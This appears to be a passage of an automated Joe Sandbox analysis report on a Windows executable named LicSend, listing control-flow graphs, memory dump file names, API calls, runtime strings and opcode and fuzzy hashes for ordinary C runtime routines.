7ff7d3b9aee0-7ff7d3b9aee4 1232->1233 1234 7ff7d3b9aed5-7ff7d3b9aed8 1232->1234 1239 7ff7d3b9aee6 1233->1239 1240 7ff7d3b9aeea-7ff7d3b9aeed 1233->1240 1234->1233 1247 7ff7d3b9ad01-7ff7d3b9ad06 1236->1247 1237->1230 1242 7ff7d3b9adca-7ff7d3b9adcd 1237->1242 1239->1240 1245 7ff7d3b9aeef-7ff7d3b9aef2 1240->1245 1246 7ff7d3b9aef4 1240->1246 1242->1230 1244->1237 1245->1246 1248 7ff7d3b9aef8-7ff7d3b9aefc 1245->1248 1247->1235
APIs
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: ErrorLast$ObjectReleaseSemaphoreSingleSleepValueWait
• String ID:
• API String ID: 4052324419-0
• Opcode ID: 098b9e2a649740763700a8127ed266a05f9c8c4706f1f0d0dabdc3d09da33519
• Instruction ID: e0f5b795cbc4edf2eee88ec7a808e05728a74ef8f1ae7bba7d4c0a128b9df637
• Opcode Fuzzy Hash: 098b9e2a649740763700a8127ed266a05f9c8c4706f1f0d0dabdc3d09da33519
• Instruction Fuzzy Hash: 93314C31E1A6038AE6D5BB62A80463DE3A1AF44B45FD8403BCD5D27690CF3DE945CBB0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1250 7ff7d3b9accb-7ff7d3b9acd9 SetLastError 1251 7ff7d3b9ad90-7ff7d3b9adaa calloc 1250->1251 1252 7ff7d3b9acdf-7ff7d3b9ace5 1250->1252 1255 7ff7d3b9adb0 1251->1255 1256 7ff7d3b9aec3-7ff7d3b9aed3 abort 1251->1256 1253 7ff7d3b9add8-7ff7d3b9adff call 7ff7d3b9fea8 1252->1253 1254 7ff7d3b9aceb-7ff7d3b9acf7 1252->1254 1253->1256 1268 7ff7d3b9ae05-7ff7d3b9ae1f memset 1253->1268 1259 7ff7d3b9ac97-7ff7d3b9aca3 1254->1259 1260 7ff7d3b9acf9-7ff7d3b9ad06 call 7ff7d3b9ab70 1254->1260 1261 7ff7d3b9adb3-7ff7d3b9adc4 TlsSetValue 1255->1261 1257 7ff7d3b9aee0-7ff7d3b9aee4 1256->1257 1258 7ff7d3b9aed5-7ff7d3b9aed8 1256->1258 1263 7ff7d3b9aee6 1257->1263 1264 7ff7d3b9aeea-7ff7d3b9aeed 1257->1264 1258->1257 1260->1259 1261->1254 1266 7ff7d3b9adca-7ff7d3b9adcd 1261->1266 1263->1264 1269 7ff7d3b9aeef-7ff7d3b9aef2 1264->1269 1270 7ff7d3b9aef4 1264->1270 1266->1254 1268->1261 1269->1270 1272 7ff7d3b9aef8-7ff7d3b9aefc 1269->1272
APIs
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: ErrorLastValuecallocmemset
• String ID:
• API String ID: 115352733-0
• Opcode ID: 674e6714b28f29a72f36b74423ec53ee68051ed7681bef0e89a3bcbb63d28129
• Instruction ID: 08a19772137c937501833bf80c16d35d511391777fc66cda3ad742fe80bf87d3
• Opcode Fuzzy Hash: 674e6714b28f29a72f36b74423ec53ee68051ed7681bef0e89a3bcbb63d28129
• Instruction Fuzzy Hash: 39219522A0BA4685EAD6BB14D44477CE3A5EF44B84FE58037C98D27B91DE3CE945C370

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1274 7ff7d3b9ab70-7ff7d3b9ab85 1275 7ff7d3b9abc0-7ff7d3b9abcd malloc 1274->1275 1276 7ff7d3b9ab87-7ff7d3b9ab93 malloc 1274->1276 1277 7ff7d3b9ac02-7ff7d3b9ac08 abort 1275->1277 1279 7ff7d3b9abcf-7ff7d3b9abe8 1275->1279 1276->1277 1278 7ff7d3b9ab95-7ff7d3b9aba6 1276->1278 1280 7ff7d3b9aba8-7ff7d3b9abbd memcpy 1278->1280 1281 7ff7d3b9abea-7ff7d3b9ac01 memset 1278->1281 1279->1280 1279->1281
APIs
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: malloc$abortmemcpymemset
• String ID:
• API String ID: 4174897659-0
• Opcode ID: f60c9ccde6cc24ebbe6c25cd49c6c31d230bca9fadfba88e236426f03def9ec8
• Instruction ID: eca9cb77334ebad457a83d178a72027143e9bbfc867d8b5d8ad196fe805a379b
• Opcode Fuzzy Hash: f60c9ccde6cc24ebbe6c25cd49c6c31d230bca9fadfba88e236426f03def9ec8
• Instruction Fuzzy Hash: 6901C263B06A4840EAC4AB56E4015EDE761EB94FD0FC48132CE4C27382EE38E981C370

                                                                                                    Control-flow Graph (legend: Executed / Not Executed; graph rendering not reproduced in text). Entry block at 7ff7d3b91291; the graph's blocks call malloc and memcpy and the internal routines at 7ff7d3b99710, 7ff7d3b95260, 7ff7d3b9fe58 and 7ff7d3b9fe18.
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    • Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                    • Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: malloc$memcpy
                                                                                                    • String ID: r>
                                                                                                    • API String ID: 3800483350-945394243
                                                                                                    • Opcode ID: 1cb63d5b23db35d8ba80ed2079e12d0303c5da2bdf329d9fda7d7100d3d1e76f
                                                                                                    • Instruction ID: 5b0cd99061fc6969a3b5e211921c0190832162dee86389ca9ae1e9a0a9de5333
                                                                                                    • Opcode Fuzzy Hash: 1cb63d5b23db35d8ba80ed2079e12d0303c5da2bdf329d9fda7d7100d3d1e76f
                                                                                                    • Instruction Fuzzy Hash: BC319926E1A60689EAD1AF41E4403BDE760BB4CB91FC44137CA4D23396DF3CA894E770

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Value$Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2242701089-0
                                                                                                    • Opcode ID: 75fbf50a7cce4f1bb34b63ad973ab3266364df8118ae08a2d51d38ba088dce60
                                                                                                    • Instruction ID: a5010e2bc993780b310f3c458a4fdb4f288961facdfda5884a23a7dd5756628c
                                                                                                    • Opcode Fuzzy Hash: 75fbf50a7cce4f1bb34b63ad973ab3266364df8118ae08a2d51d38ba088dce60
                                                                                                    • Instruction Fuzzy Hash: 2FF01C28E2954786EA94BBA1EC5103DF762BF98314FC44036C84D22274DE3CE615CFB0

                                                                                                    Control-flow Graph (legend: Executed / Not Executed; graph rendering not reproduced in text). Entry block at 7ff7d3b98800; the graph's blocks call wcslen, memset and wcscpy and the internal routines at 7ff7d3b98640, 7ff7d3b9951d and 7ff7d3b99559.
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3616488086-0
                                                                                                    • Opcode ID: 9edfd7d0855425b0ae0deef05893c38e1a612db14593e8ff65947f8ca7eeef7c
                                                                                                    • Instruction ID: 7216858a60425caeff7613da0c036e6227e86e616cd0683bc868bd17fe767ea3
                                                                                                    • Opcode Fuzzy Hash: 9edfd7d0855425b0ae0deef05893c38e1a612db14593e8ff65947f8ca7eeef7c
                                                                                                    • Instruction Fuzzy Hash: 71210623A1968582E6A0AF11A4407AFE650FB847A4FD00236EFDD66AD5DF7CD146C720

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _wgetenv
                                                                                                    • String ID: .\
                                                                                                    • API String ID: 1821490009-2381021295
                                                                                                    • Opcode ID: f65007826c5d2034e0bd6c0c5d75f5bc2e06cb7173540385dc56eda673c3ae7b
                                                                                                    • Instruction ID: c2f76b122ab5bf2641de768e6e41e0d7b3cb406b55100f555da9a66e22698162
                                                                                                    • Opcode Fuzzy Hash: f65007826c5d2034e0bd6c0c5d75f5bc2e06cb7173540385dc56eda673c3ae7b
                                                                                                    • Instruction Fuzzy Hash: 42317021A1AB8185EB90EB35D45426EF7A0FB59B84FC08036EA8D577A5EF7CD040C760

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$wcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3662116142-0
                                                                                                    • Opcode ID: ad7ea264d6705331f8fa69273285dea50bc2cad2ccac6b1ac045f466d01280f1
                                                                                                    • Instruction ID: 2b8492b6184e47365517438d4fa0e6f33adae11ae51a65507a14607db5445efe
                                                                                                    • Opcode Fuzzy Hash: ad7ea264d6705331f8fa69273285dea50bc2cad2ccac6b1ac045f466d01280f1
                                                                                                    • Instruction Fuzzy Hash: D901C86271969141E2A0B616A8017EEE651AFC6BD0FD44132FECD23B85CE3CD5458724
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2221118986-0
                                                                                                    • Opcode ID: 8dea576aef8b981f98a8e7ecd974372a96d658d19b6fe639ef29c091e0349c6e
                                                                                                    • Instruction ID: e5461a29bb6db0dc054088836bf50d9c9e1bc588e992110b983f05339c909736
                                                                                                    • Opcode Fuzzy Hash: 8dea576aef8b981f98a8e7ecd974372a96d658d19b6fe639ef29c091e0349c6e
                                                                                                    • Instruction Fuzzy Hash: 01F08256B1869641F750AA22A40477FD612A7C8BD4FC48132BE8C5B78EDE3CC4428760
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: signal
                                                                                                    • String ID: CCG
                                                                                                    • API String ID: 1946981877-1584390748
                                                                                                    • Opcode ID: ff0d2e7fe901426664e72cbee57569d38bce1223c774222f042353948147b660
                                                                                                    • Instruction ID: a6af33790a57206277bf6a31c5900f5bb35944259913af7b49f8b14d10d2f07a
                                                                                                    • Opcode Fuzzy Hash: ff0d2e7fe901426664e72cbee57569d38bce1223c774222f042353948147b660
                                                                                                    • Instruction Fuzzy Hash: CC416121E0B50205FAF93579446037CD6825F89375FEA8633DAADA63E2CD6DBC804136
APIs
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: memcpymemset
• String ID:
• API String ID: 1297977491-0
• Opcode ID: ae8519573d4ae9c42e31059e83050413f9089caf48a080b88ae2979aca7b1806
• Instruction ID: b0b63c1e9b74a470c58d6690d23d985a6403ee97a567ba5ad5ed2274f1b0dab7
• Opcode Fuzzy Hash: ae8519573d4ae9c42e31059e83050413f9089caf48a080b88ae2979aca7b1806
• Instruction Fuzzy Hash: A9D1D622A1EA8255EB91EB25E5053ADF7A0AF59784FC48037DA8C57792EF7CE040C770
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: fwprintf
• String ID: %*.*S$%-*.*S$%.*S
• API String ID: 968622242-2115465065
• Opcode ID: a0e62aa8157b28b3d79c8082a980be0690bed007e69c92a4893852fddf75eae1
• Instruction ID: d4ea3e1de65e15763937dd7db30229ad7dc49fec2fba252e07e6e0c1fcad1f60
• Opcode Fuzzy Hash: a0e62aa8157b28b3d79c8082a980be0690bed007e69c92a4893852fddf75eae1
• Instruction Fuzzy Hash: A9411463B1E65245EBD0EA25940037CE290AB84BA4FD88132DA9C676C5DE3DE4418F30
APIs
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: Value$CriticalDeleteSectionfree
• String ID:
• API String ID: 2588641659-0
• Opcode ID: 89dab954741aa753b00091b9a80090c60610944642656ed0f2500b768da80e0e
• Instruction ID: 4e9f9d42130a1403b28930718d3ead9fc1ce0c785c2b9e0d8699606008ff15b2
• Opcode Fuzzy Hash: 89dab954741aa753b00091b9a80090c60610944642656ed0f2500b768da80e0e
• Instruction Fuzzy Hash: EE31C964D2E54786EBD4BBA1E85423DF7A1AF98714FC44033D44E222A4DE7CE654CBB0
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: Value$_assertcalloc
• String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
• API String ID: 3698345500-799109717
• Opcode ID: 3b4b24fa9e65e4cdbba62bd9e1109a5aff04400886c084b3c01c50dbac16368f
• Instruction ID: fc220f2d4527cd46de420e23977c18905c2a1cd3983352b4c9fb7b37f5f54db3
• Opcode Fuzzy Hash: 3b4b24fa9e65e4cdbba62bd9e1109a5aff04400886c084b3c01c50dbac16368f
• Instruction Fuzzy Hash: B8019271B1A60645F7D5AB91F9502BCE791AF4C790FC84036DA4C63391EE3CA991CB70
Strings
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID:
• String ID: %*.*s$%-*.*s$%.*s
• API String ID: 0-4054516066
• Opcode ID: 009bcb3d2477e4a7c16a06a38b63ac2a528fc33943df209ece00bc248c0d887a
• Instruction ID: 03d3d11e6bbda9ea23a4310d7c8f5d17a65abb32c9644979adf7b17c659a8800
• Opcode Fuzzy Hash: 009bcb3d2477e4a7c16a06a38b63ac2a528fc33943df209ece00bc248c0d887a
• Instruction Fuzzy Hash: 8241D472A1D20686E7E0EF25C40027CF790EF44B54FD4C136DE8C6A285EAECA6418F70
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176010115.00007FF7D3DCE000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2176060782.00007FF7D3DCF000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff7d3b90000_LicSend.jbxd
Yara matches
Similarity
• API ID: ErrorLastProtectVirtual
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 1672467334-2123141913
• Opcode ID: b940c59f6861739a50ef932f14fd1f400c8da73d928a9f53d8f92ccb962f4c41
• Instruction ID: d6290707b805a3501a82163937bb2615797b1838e3da772acbd31625f577ee60
• Opcode Fuzzy Hash: b940c59f6861739a50ef932f14fd1f400c8da73d928a9f53d8f92ccb962f4c41
• Instruction Fuzzy Hash: AA31A222A1A6428AEAE1AB51E8406BDF760FB44794FC48133DE8D23294DE3CE945C770
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2175410318.00007FF7D3B91000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7D3B90000, based on PE: true
• Associated: 00000007.00000002.2175347825.00007FF7D3B90000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175439723.00007FF7D3BA1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175488277.00007FF7D3BA2000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175579159.00007FF7D3BA3000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175654425.00007FF7D3BCC000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175793991.00007FF7D3DC4000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175918663.00007FF7D3DC6000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.2175983789.00007FF7D3DCB000.00000004.00000001.01000000.0000000B.sdmp
